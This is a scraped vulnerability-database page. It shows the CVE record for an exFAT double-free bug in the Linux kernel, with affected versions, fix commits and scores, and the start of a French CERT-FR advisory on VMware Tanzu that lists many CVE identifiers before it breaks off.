Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-38206 (GCVE-0-2025-38206)
Vulnerability from cvelistv5 – Published: 2025-07-04 13:37 – Updated: 2026-05-11 21:23| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003 , < 13d8de1b6568dcc31a95534ced16bc0c9a67bc15
(git)
Affected: 1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003 , < 66e84439ec2af776ce749e8540f8fdd257774152 (git) Affected: 1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003 , < d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd (git) Affected: 1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003 , < 1f3d9724e16d62c7d42c67d6613b8512f2887c22 (git) |
|
| Linux | Linux |
Affected:
5.7
Unaffected: 0 , < 5.7 (semver) Unaffected: 5.10.239 , ≤ 5.10.* (semver) Unaffected: 5.15.186 , ≤ 5.15.* (semver) Unaffected: 6.15.4 , ≤ 6.15.* (semver) Unaffected: 6.16 , ≤ * (original_commit_for_fix) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-03T17:35:27.691Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/exfat/nls.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13d8de1b6568dcc31a95534ced16bc0c9a67bc15",
"status": "affected",
"version": "1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003",
"versionType": "git"
},
{
"lessThan": "66e84439ec2af776ce749e8540f8fdd257774152",
"status": "affected",
"version": "1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003",
"versionType": "git"
},
{
"lessThan": "d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd",
"status": "affected",
"version": "1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003",
"versionType": "git"
},
{
"lessThan": "1f3d9724e16d62c7d42c67d6613b8512f2887c22",
"status": "affected",
"version": "1acf1a564b6034b5af1e7fb23cb98cb3bb4f6003",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/exfat/nls.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.239",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.186",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.15.*",
"status": "unaffected",
"version": "6.15.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.239",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.186",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.15.4",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.16",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix double free in delayed_free\n\nThe double free could happen in the following path.\n\nexfat_create_upcase_table()\n exfat_create_upcase_table() : return error\n exfat_free_upcase_table() : free -\u003evol_utbl\n exfat_load_default_upcase_table : return error\n exfat_kill_sb()\n delayed_free()\n exfat_free_upcase_table() \u003c--------- double free\nThis patch set -\u003evol_util as NULL after freeing it."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T21:23:18.488Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13d8de1b6568dcc31a95534ced16bc0c9a67bc15"
},
{
"url": "https://git.kernel.org/stable/c/66e84439ec2af776ce749e8540f8fdd257774152"
},
{
"url": "https://git.kernel.org/stable/c/d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd"
},
{
"url": "https://git.kernel.org/stable/c/1f3d9724e16d62c7d42c67d6613b8512f2887c22"
}
],
"title": "exfat: fix double free in delayed_free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-38206",
"datePublished": "2025-07-04T13:37:25.966Z",
"dateReserved": "2025-04-16T04:51:23.994Z",
"dateUpdated": "2026-05-11T21:23:18.488Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-38206",
"date": "2026-06-05",
"epss": "0.00071",
"percentile": "0.21827"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-38206\",\"sourceIdentifier\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"published\":\"2025-07-04T14:15:28.703\",\"lastModified\":\"2025-12-18T21:17:09.210\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"In the Linux kernel, the following vulnerability has been resolved:\\n\\nexfat: fix double free in delayed_free\\n\\nThe double free could happen in the following path.\\n\\nexfat_create_upcase_table()\\n exfat_create_upcase_table() : return error\\n exfat_free_upcase_table() : free -\u003evol_utbl\\n exfat_load_default_upcase_table : return error\\n exfat_kill_sb()\\n delayed_free()\\n exfat_free_upcase_table() \u003c--------- double free\\nThis patch set -\u003evol_util as NULL after freeing it.\"},{\"lang\":\"es\",\"value\":\"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: exfat: corrige la doble liberaci\u00f3n en delayed_free La doble liberaci\u00f3n podr\u00eda ocurrir en la siguiente ruta. exfat_create_upcase_table() exfat_create_upcase_table() : devolver error exfat_free_upcase_table() : liberar -\u0026gt;vol_utbl exfat_load_default_upcase_table : devolver error exfat_kill_sb() delayed_free() exfat_free_upcase_table() \u0026lt;--------- doble liberaci\u00f3n Este parche establece -\u0026gt;vol_util como NULL despu\u00e9s de liberarlo.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-415\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.7\",\"versionEndExcluding\":\"5.10.239\",\"matchCriteriaId\":\"0770A04F-68CB-4B08-8E99-2466EB67D7A0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.11\",\"versionEndExcluding\":\"5.15.186\",\"matchCriteriaId\":\"D96F2C0D-0D4A-4658-AD34-D8A626EA422D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.16\",\"versionEndExcluding\":\"6.15.4\",\"matchCriteriaId\":\"CF41C6A0-D0C0-49DF-8756-8E9A19FCC39A\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FA6FEEC2-9F11-4643-8827-749718254FED\"}]}]}],\"references\":[{\"url\":\"https://git.kernel.org/stable/c/13d8de1b6568dcc31a95534ced16bc0c9a67bc15\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/1f3d9724e16d62c7d42c67d6613b8512f2887c22\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/66e84439ec2af776ce749e8540f8fdd257774152\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://git.kernel.org/stable/c/d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd\",\"source\":\"416baaa9-dc9f-4396-8d5f-8c081fb06d67\",\"tags\":[\"Patch\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"Mailing List\"]}]}}"
}
}
CERTFR-2025-AVI-1054
Vulnerability from certfr_avis - Published: 2025-12-01 - Updated: 2025-12-01
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.954.x | ||
| VMware | Tanzu Application Service | Stemcells (Ubuntu Noble) versions antérieures à 1.134.x | ||
| VMware | Tanzu Operations Manager | Tanzu Platform versions antérieures à 3.1.5-build.398 | ||
| VMware | Tanzu Operations Manager | Tanzu Platform versions antérieures à 3.2.1-build.271 |
| Title | Publication Time | Tags | ||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.954.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.134.x",
"product": {
"name": "Tanzu Application Service",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 3.1.5-build.398",
"product": {
"name": "Tanzu Operations Manager",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Platform versions ant\u00e9rieures \u00e0 3.2.1-build.271",
"product": {
"name": "Tanzu Operations Manager",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-1343",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1343"
},
{
"name": "CVE-2023-0216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0216"
},
{
"name": "CVE-2022-1473",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1473"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2023-0401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0401"
},
{
"name": "CVE-2025-38328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38328"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2025-38100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38100"
},
{
"name": "CVE-2025-38108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38108"
},
{
"name": "CVE-2025-38230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38230"
},
{
"name": "CVE-2025-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38229"
},
{
"name": "CVE-2025-38147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38147"
},
{
"name": "CVE-2024-26896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26896"
},
{
"name": "CVE-2025-38286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38286"
},
{
"name": "CVE-2025-38515",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38515"
},
{
"name": "CVE-2025-38163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38163"
},
{
"name": "CVE-2025-38444",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38444"
},
{
"name": "CVE-2024-26700",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26700"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2025-38157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38157"
},
{
"name": "CVE-2025-38323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38323"
},
{
"name": "CVE-2025-38219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38219"
},
{
"name": "CVE-2025-38466",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38466"
},
{
"name": "CVE-2022-1292",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1292"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2023-3817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2025-38313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38313"
},
{
"name": "CVE-2025-38336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38336"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2024-26726",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26726"
},
{
"name": "CVE-2023-52593",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52593"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2024-44939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44939"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2025-38112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38112"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2025-38203",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38203"
},
{
"name": "CVE-2025-38387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38387"
},
{
"name": "CVE-2025-38362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38362"
},
{
"name": "CVE-2025-38371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38371"
},
{
"name": "CVE-2025-38445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38445"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2025-38461",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38461"
},
{
"name": "CVE-2024-13176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2025-38305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38305"
},
{
"name": "CVE-2025-38067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38067"
},
{
"name": "CVE-2023-5363",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5363"
},
{
"name": "CVE-2022-2068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2068"
},
{
"name": "CVE-2025-38401",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38401"
},
{
"name": "CVE-2023-0466",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2025-38102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38102"
},
{
"name": "CVE-2023-0465",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
},
{
"name": "CVE-2022-4203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4203"
},
{
"name": "CVE-2025-37958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37958"
},
{
"name": "CVE-2025-38399",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38399"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2025-38412",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38412"
},
{
"name": "CVE-2025-38293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38293"
},
{
"name": "CVE-2025-38184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38184"
},
{
"name": "CVE-2025-38458",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38458"
},
{
"name": "CVE-2025-6297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6297"
},
{
"name": "CVE-2025-38135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38135"
},
{
"name": "CVE-2025-38312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38312"
},
{
"name": "CVE-2025-38464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38464"
},
{
"name": "CVE-2025-38363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38363"
},
{
"name": "CVE-2025-38319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38319"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2025-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38457"
},
{
"name": "CVE-2025-38212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38212"
},
{
"name": "CVE-2023-0217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0217"
},
{
"name": "CVE-2025-38298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38298"
},
{
"name": "CVE-2025-38419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38419"
},
{
"name": "CVE-2022-3786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3786"
},
{
"name": "CVE-2025-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38546"
},
{
"name": "CVE-2025-38211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38211"
},
{
"name": "CVE-2025-38251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38251"
},
{
"name": "CVE-2025-38120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38120"
},
{
"name": "CVE-2025-38285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38285"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2025-38161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38161"
},
{
"name": "CVE-2025-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38115"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2025-38153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38153"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2025-38395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38395"
},
{
"name": "CVE-2025-38337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38337"
},
{
"name": "CVE-2025-38727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38727"
},
{
"name": "CVE-2025-38465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38465"
},
{
"name": "CVE-2025-38513",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38513"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2023-0464",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
},
{
"name": "CVE-2025-38441",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38441"
},
{
"name": "CVE-2025-38227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38227"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2024-57883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57883"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2025-38074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38074"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-38245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38245"
},
{
"name": "CVE-2025-38324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38324"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2025-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38542"
},
{
"name": "CVE-2025-38344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38344"
},
{
"name": "CVE-2025-38088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38088"
},
{
"name": "CVE-2025-38332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38332"
},
{
"name": "CVE-2025-38386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38386"
},
{
"name": "CVE-2025-38237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38237"
},
{
"name": "CVE-2025-38174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38174"
},
{
"name": "CVE-2025-21888",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21888"
},
{
"name": "CVE-2025-38342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38342"
},
{
"name": "CVE-2025-38167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38167"
},
{
"name": "CVE-2025-38257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38257"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2025-38111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38111"
},
{
"name": "CVE-2025-38326",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38326"
},
{
"name": "CVE-2025-12818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12818"
},
{
"name": "CVE-2025-38384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38384"
},
{
"name": "CVE-2025-38424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38424"
},
{
"name": "CVE-2025-38430",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38430"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2025-38420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38420"
},
{
"name": "CVE-2025-38160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38160"
},
{
"name": "CVE-2025-38107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38107"
},
{
"name": "CVE-2025-38085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38085"
},
{
"name": "CVE-2025-38222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38222"
},
{
"name": "CVE-2025-38197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38197"
},
{
"name": "CVE-2025-38467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38467"
},
{
"name": "CVE-2023-6237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2025-38617",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38617"
},
{
"name": "CVE-2025-38122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38122"
},
{
"name": "CVE-2024-7592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2025-38173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38173"
},
{
"name": "CVE-2025-38143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38143"
},
{
"name": "CVE-2022-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3996"
},
{
"name": "CVE-2025-38416",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38416"
},
{
"name": "CVE-2025-38194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38194"
},
{
"name": "CVE-2024-0727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2025-12817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12817"
},
{
"name": "CVE-2025-38348",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38348"
},
{
"name": "CVE-2025-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38540"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2025-38146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38146"
},
{
"name": "CVE-2025-38418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38418"
},
{
"name": "CVE-2025-38090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38090"
},
{
"name": "CVE-2025-40300",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40300"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2024-0397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
},
{
"name": "CVE-2023-1255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1255"
},
{
"name": "CVE-2024-12254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12254"
},
{
"name": "CVE-2025-8114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
},
{
"name": "CVE-2025-38193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38193"
},
{
"name": "CVE-2025-38400",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38400"
},
{
"name": "CVE-2024-26775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26775"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-38136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38136"
},
{
"name": "CVE-2022-3358",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3358"
},
{
"name": "CVE-2022-2097",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2097"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-38477",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38477"
},
{
"name": "CVE-2025-30722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30722"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2025-38185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38185"
},
{
